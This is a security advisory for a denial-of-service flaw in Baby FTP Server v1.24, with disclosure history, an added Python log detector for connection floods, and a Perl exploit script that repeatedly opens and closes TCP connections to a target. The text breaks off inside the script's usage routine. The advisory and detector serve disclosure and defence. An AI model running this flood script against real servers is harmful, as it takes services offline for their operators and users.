[DCA-0004]
[Software]
 - Baby FTP Server
[Vendor Product Description]
 - Baby FTP server has only the most necessary features and is yet
powerful enough to be a basis for a more complex server
[Bug Description]
 - The FTP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service
[History]
 - Advisory sent to vendor on 06/14/2010.
 - No response from vendor
 - Public advisory & exploit 08/02/2010.
[Impact]
 - Low
[Affected Version]
 - Baby FTP Server v1.24
 - Prior versions may also be vulnerable
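[Detection example]
 - Added example, not part of the original advisory and not vendor code: a log check for the condition in [Bug Description], flagging a source that opens and closes many sessions without sending any FTP command. The log format, the function name find_connection_floods, the threshold and the window are assumptions; the sample log is constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log. The line format is an assumption, not Baby FTP
# Server's own: one normal session, then 30 connect/close pairs in 58 ms.
SAMPLE_LOG = (
    "2010-08-02 12:00:00.000 198.51.100.7:51000 CONNECT\n"
    "2010-08-02 12:00:01.000 198.51.100.7:51000 CMD USER alice\n"
    "2010-08-02 12:00:05.000 198.51.100.7:51000 DISCONNECT\n"
    + "".join(
        f"2010-08-02 12:00:10.{i:03d} 192.0.2.10:{40000 + i} CONNECT\n"
        f"2010-08-02 12:00:10.{i:03d} 192.0.2.10:{40000 + i} DISCONNECT\n"
        for i in range(0, 60, 2)
    )
)


def find_connection_floods(log_text, threshold=20, window=timedelta(seconds=5)):
    """Return {source_ip: peak number of command-less sessions closed inside
    `window`} for every source whose peak reaches `threshold`."""
    sent_command = {}                  # "ip:port" -> True once a CMD is seen
    empty_closes = defaultdict(deque)  # ip -> close times of empty sessions
    peaks = {}
    for line in log_text.splitlines():
        parts = line.split(maxsplit=3)
        if len(parts) < 4:
            continue  # skip blank or malformed lines
        ts = datetime.strptime(f"{parts[0]} {parts[1]}", "%Y-%m-%d %H:%M:%S.%f")
        peer, event = parts[2], parts[3].split()[0]
        ip = peer.rsplit(":", 1)[0]
        if event == "CONNECT":
            sent_command[peer] = False
        elif event == "CMD":
            sent_command[peer] = True
        elif event == "DISCONNECT":
            if sent_command.pop(peer, True):
                continue  # normal session, or one whose open we never saw
            recent = empty_closes[ip]
            recent.append(ts)
            while ts - recent[0] > window:
                recent.popleft()  # drop closes that fell out of the window
            if len(recent) >= threshold:
                peaks[ip] = max(peaks.get(ip, 0), len(recent))
    return peaks


if __name__ == "__main__":
    for ip, count in find_connection_floods(SAMPLE_LOG).items():
        print(f"{ip}: {count} command-less sessions inside the window")
```
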
[Code]
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
    usage();
}
$ip   = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num  = 0;
print "[+] Sending request...\n";
while ( $num <= $conn ) {
    system("echo -n .");
    $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
    close($s);
    $num++;
}
print "\n[+] Done!\n";
sub usage() {
    print "[-] Usage: <". $0 .">